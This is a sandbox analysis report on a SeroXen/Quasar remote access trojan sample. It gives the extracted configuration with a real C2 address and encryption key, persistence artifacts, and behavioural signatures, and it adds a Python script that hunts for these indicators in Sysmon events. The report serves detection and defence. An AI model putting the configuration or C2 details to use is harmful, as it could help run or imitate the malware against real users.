Analysis

max time kernel: 253s
max time network: 261s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-07-2024 16:44

Static task: static1
Behavioral task: behavioral1
Sample: SeroXen.rar
Resource: win10v2004-20240508-en

General
Target: SeroXen.rar
Size: 7.4MB
MD5: 3e5e034189b129f8ffd7b6ae57982740
SHA1: a099319659a4852ee87219d15bd04606660a9afa
SHA256: 43b56573aa46b0a5c526e41ef58f0e902074181622a7b7508fa97c447b8afcc9
SHA512: 578eec54ab0603ba4689590a181510e9aaf04bb3863f6283f19ff241f343ccd9cfbac8d35b7bcb65ece1d76122e0b808f90918ac468e3b4987717bd821c5b258
SSDEEP: 196608:zSoEufZDDXsWegc13ygKrA8Uwsqew2k8ASGh/RHrw:zSoZDDXvcwrA8KkLB/hw
Malware Config

Extracted
Family: quasar
Version: 15.5.0
Botnet: SeroXen
C2: 147.185.221.20:49485
Mutex: QSR_MUTEX_rzhQPLl57DqbMvbZp9
encryption_key: M2nw0PLpJxuyZQLyQ14p
install_name: Client.exe
log_directory: $sxr-Logs
reconnect_delay: 3000
startup_key: Quasar Client Startup
subdirectory: SubDir

The C2 address and port, the mutex name, the Run-key value name (startup_key) and the install path fragment (subdirectory\install_name) are the host and network indicators to carry into detection; the encryption key and reconnect delay are client settings and are not useful for hunting on their own.
Signatures

Quasar payload (1 IoC)
resource: behavioral1/memory/1984-623-0x000001B5C7340000-0x000001B5C739E000-memory.dmp
yara_rule: family_quasar
The dump name carries the source PID: 1984 is the powershell.exe instance that also makes the blocklisted network requests below, so the Quasar payload was running inside PowerShell.

Blocklisted process makes network request (3 IoCs)
flow 104: pid 1984 powershell.exe
flow 105: pid 1984 powershell.exe
flow 108: pid 1984 powershell.exe
Processes: powershell.exe (8 IoCs)
pid 5364, 5348, 4384, 1140, 4368, 1984, 556, 5160 (all powershell.exe)
Downloads MZ/PE file
Checks computer location settings (2 TTPs, 5 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
by WScript.exe (2 entries) and SeroXen.exe (3 entries)
Many legitimate components read this value, so the query alone is weak evidence; it is worth noting here only because the readers are the dropped SeroXen.exe and a WScript.exe instance.
Event Triggered Execution: Component Object Model Hijacking (1 TTP)
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
No IoC is listed for this rule. The only COM registration visible in this report is the 7-Zip shell-extension CLSID {23170F69-40C1-278A-1000-000100020000} written by 7z2407-x64.exe (see "Modifies registry class" below), which is the installer's normal behaviour, so treat this TTP as a probable false positive unless the full registry log shows other COM writes.
Executes dropped EXE (8 IoCs)
pid 5652 7z2407-x64.exe
pid 5676 7zG.exe
pid 5840, 4124, 5272, 6088, 4036, 3028 SeroXen.exe
7z2407-x64.exe and 7zG.exe are the 7-Zip 24.07 installer and GUI; they account for the Program Files and 7-Zip CLSID registry activity further down. The six SeroXen.exe instances are the sample.
Loads dropped DLL (2 IoCs)
pid 3524 Explorer.EXE
pid 5676 7zG.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 103: ip-api.com
Drops file in System32 directory (4 IoCs)
File opened for modification: C:\Windows\System32\Tasks\$phantom-RuntimeBroker_startup_199_str (svchost.exe)
File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 (svchost.exe)
File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (svchost.exe)
File opened for modification: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 (svchost.exe)
The first entry is the Task Scheduler service writing a task definition, which means a scheduled task named $phantom-RuntimeBroker_startup_199_str was registered during the run; that is the persistence artifact to look for on a host. The three CryptnetUrlCache entries are the system certificate and CRL fetch cache and are routine.
Drops file in Program Files directory (64 IoCs)
All 64 entries are "File opened for modification" by 7z2407-x64.exe under C:\Program Files\7-Zip\, i.e. the 7-Zip installer laying down its own tree:
7z.exe, 7zG.exe, 7z.dll, 7-zip32.dll, 7z.sfx, Uninstall.exe, 7-zip.chm, License.txt, History.txt
Lang\ (55 files): mn.txt, sq.txt, th.txt, en.ttt, ka.txt, ug.txt, cs.txt, lv.txt, nb.txt, et.txt, fa.txt, yo.txt, hr.txt, gu.txt, is.txt, ja.txt, hi.txt, kk.txt, af.txt, ku.txt, nl.txt, sl.txt, uz.txt, fur.txt, vi.txt, br.txt, eo.txt, fi.txt, mk.txt, tr.txt, he.txt, ca.txt, da.txt, lij.txt, fr.txt, ga.txt, sa.txt, zh-tw.txt, bn.txt, ms.txt, pt.txt, sk.txt, de.txt, kab.txt, pa-in.txt, ru.txt, sv.txt, uz-cyrl.txt, eu.txt, hy.txt, ko.txt, si.txt, uk.txt, ro.txt, an.txt
Drops file in Windows directory (2 IoCs)
File created: C:\Windows\Uni.bat (SeroXen.exe)
File opened for modification: C:\Windows\Uni.bat (SeroXen.exe)
Writing directly under C:\Windows requires administrative rights, so the sample was running elevated in this run. The batch file is a second on-disk artifact to collect alongside the scheduled task.
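The indicators gathered so far (the extracted C2 and mutex, the Run-key value name and install path fragment from the config, the ip-api.com lookup made by powershell.exe, the task file under System32\Tasks and C:\Windows\Uni.bat) are enough to build a small hunt. The script below is an added example, not part of the sandbox report or of any tool it references: it matches those indicators against Sysmon-style events in JSON-lines form. The event lines are constructed for illustration, the non-C2 addresses are documentation ranges, and the install location under %APPDATA%\SubDir\Client.exe is an assumption (the report gives only subdirectory and install_name). Mutex creation is not something Sysmon records, so that check takes a list of named-object handles instead.

```python
"""Hunt for this report's SeroXen/Quasar indicators in Sysmon-style events.

Added example: the indicator values come from the report above; the
JSON event lines and the install path under %APPDATA% are constructed
for illustration and are not from the sandbox run.
"""
import json

# From the extracted config and the signature tables above.
C2_HOST, C2_PORT = "147.185.221.20", 49485
MUTEX = "QSR_MUTEX_rzhQPLl57DqbMvbZp9"
STARTUP_KEY = "Quasar Client Startup"                 # startup_key: Run value name
TASK_NAME = "$phantom-RuntimeBroker_startup_199_str"  # task file under System32\Tasks
INSTALL_SUFFIX = "\\subdir\\client.exe"               # subdirectory + install_name
DROPPED_FILES = {"c:\\windows\\uni.bat"}
IP_LOOKUP_HOSTS = {"ip-api.com"}


def match_event(ev: dict) -> list[str]:
    """Return the names of the indicators a single event matches."""
    hits = []
    eid = ev.get("EventID")
    image = ev.get("Image", "").lower()
    if eid == 3:  # network connection
        if ev.get("DestinationIp") == C2_HOST and ev.get("DestinationPort") == C2_PORT:
            hits.append("quasar_c2")
        # The report shows the lookup coming from powershell.exe; a browser
        # reaching the same service is not interesting on its own.
        if (ev.get("DestinationHostname", "").lower() in IP_LOOKUP_HOSTS
                and image.endswith("powershell.exe")):
            hits.append("external_ip_lookup_from_powershell")
    elif eid == 11:  # file create
        target = ev.get("TargetFilename", "").lower()
        if target in DROPPED_FILES:
            hits.append("dropped_uni_bat")
        if target == "c:\\windows\\system32\\tasks\\" + TASK_NAME.lower():
            hits.append("scheduled_task_registered")
        if target.endswith(INSTALL_SUFFIX):
            hits.append("quasar_install_path")
    elif eid == 13:  # registry value set
        key_path, _, value_name = ev.get("TargetObject", "").rpartition("\\")
        if key_path.lower().endswith("\\currentversion\\run") and value_name == STARTUP_KEY:
            hits.append("run_key_startup")
    return hits


def scan(lines):
    """Scan JSON-lines events; return (EventID, indicator) pairs in order."""
    found = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        found.extend((ev["EventID"], name) for name in match_event(ev))
    return found


def mutex_present(handle_names) -> bool:
    """Sysmon does not record mutex creation, so the configured mutex has to
    be checked against a live handle listing (names of BaseNamedObjects)."""
    return any(name.endswith(MUTEX) for name in handle_names)


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed; addresses other than the C2 are documentation ranges
    json.dumps({"EventID": 3, "Image": PS, "DestinationIp": C2_HOST, "DestinationPort": C2_PORT}),
    json.dumps({"EventID": 3, "Image": PS, "DestinationHostname": "ip-api.com",
                "DestinationIp": "203.0.113.10", "DestinationPort": 80}),
    json.dumps({"EventID": 11, "Image": "C:\\Windows\\System32\\svchost.exe",
                "TargetFilename": "C:\\Windows\\System32\\Tasks\\" + TASK_NAME}),
    json.dumps({"EventID": 11, "Image": "C:\\Users\\Admin\\Desktop\\SeroXen.exe",
                "TargetFilename": "C:\\Windows\\Uni.bat"}),
    json.dumps({"EventID": 11, "Image": "C:\\Users\\Admin\\Desktop\\SeroXen.exe",
                "TargetFilename": "C:\\Users\\Admin\\AppData\\Roaming\\SubDir\\Client.exe"}),
    json.dumps({"EventID": 13, "Image": "C:\\Users\\Admin\\AppData\\Roaming\\SubDir\\Client.exe",
                "TargetObject": "HKU\\S-1-5-21-1181767204-2009306918-3718769404-1000\\Software"
                                "\\Microsoft\\Windows\\CurrentVersion\\Run\\" + STARTUP_KEY}),
    json.dumps({"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
                "DestinationHostname": "ip-api.com", "DestinationIp": "203.0.113.10",
                "DestinationPort": 80}),
]

if __name__ == "__main__":
    for event_id, name in scan(SAMPLE_EVENTS):
        print(event_id, name)
```

The last constructed event (chrome.exe reaching ip-api.com) deliberately produces no hit: the report only flags the lookup because it came from PowerShell, and gating on the image keeps the rule from firing on every browser visit to the service.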
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry (2 TTPs, 3 IoCs)
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
All three reads come from chrome.exe, not from the sample.
Kills process with taskkill (3 IoCs)
pid 3648, 1388, 1252 taskkill.exe
Processes: Explorer.EXE (3 entries)
Key created: \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser (Explorer.EXE)
Set value (data): \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (Explorer.EXE)
Key created: \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Toolbar (Explorer.EXE)
These are the Explorer shell saving its toolbar layout and are not attributable to the sample.
Modifies data under HKEY_USERS (3 IoCs)
Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry (chrome.exe)
Set value (int): \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133643259097367612" (chrome.exe)
Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections (svchost.exe)
S-1-5-19 is the LOCAL SERVICE hive; both writers are system components rather than the sample.
Modifies registry class (64 IoCs)
7z2407-x64.exe (4 entries), the 7-Zip installer registering its shell extension:
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"
Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip
Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
powershell.exe (1 entry):
Key created: \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings
Explorer.EXE (the remaining 59 entries): ShellBag writes under \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\* and \BagMRU\* (SniffedFolderType, LogicalViewMode, Mode, Sort, ColInfo, FFlags, GroupByKey, GroupByDirection, GroupView, IconSize, Vid, Rev, NodeSlot, NodeSlots, MRUListEx, KnownFolderDerivedFolderType, and the BagMRU\1\1 and BagMRU\1\2 item ID lists). These record folder-view state for directories browsed in Explorer during the run and are not sample activity.
Opens file in notepad (likely ransom note) (1 IoC)
pid 2616 NOTEPAD.EXE
The "ransom note" wording is the rule's generic description; nothing else in this report (no mass file writes or renames) points to ransomware, so this is simply a text file being opened during the run.
Runs ping.exe (1 TTP, 1 IoC)
No process entry is listed for this rule in the report.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid 4008 chrome.exe (2 entries); 5348 powershell.exe (3); 1140 powershell.exe (3); 4368 powershell.exe (3); 1984 powershell.exe (the bulk of the remaining entries); 5272 SeroXen.exe (2)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
pid 3524 Explorer.EXE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
pid 4008 chrome.exe (5 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
All 64 entries are pid 4008 chrome.exe enabling SeShutdownPrivilege and SeCreatePagefilePrivilege in alternation; this is routine browser behaviour and not attributable to the sample.
Suspicious use of FindShellTrayWindow (43 IoCs)
pid 4008 chrome.exe (34 entries); 5676 7zG.exe (1); 3524 Explorer.EXE (8)
Suspicious use of SendNotifyMessage (27 IoCs)
pid 4008 chrome.exe (24 entries); 3524 Explorer.EXE (3)
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
OpenWith.exepowershell.exeExplorer.EXEpid process 1084 OpenWith.exe 1984 powershell.exe 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE 3524 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SeroXen.rar2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe8753ab58,0x7ffe8753ab68,0x7ffe8753ab783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2928 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4372 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4656 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff791ffae48,0x7ff791ffae58,0x7ff791ffae684⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5048 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4616 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3264 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4772 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5192 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4760 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5368 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5212 --field-trial-handle=1868,i,14179681891455114156,13001312387047595604,131072 /prefetch:83⤵
-
C:\Users\Admin\Downloads\7z2407-x64.exe"C:\Users\Admin\Downloads\7z2407-x64.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
-
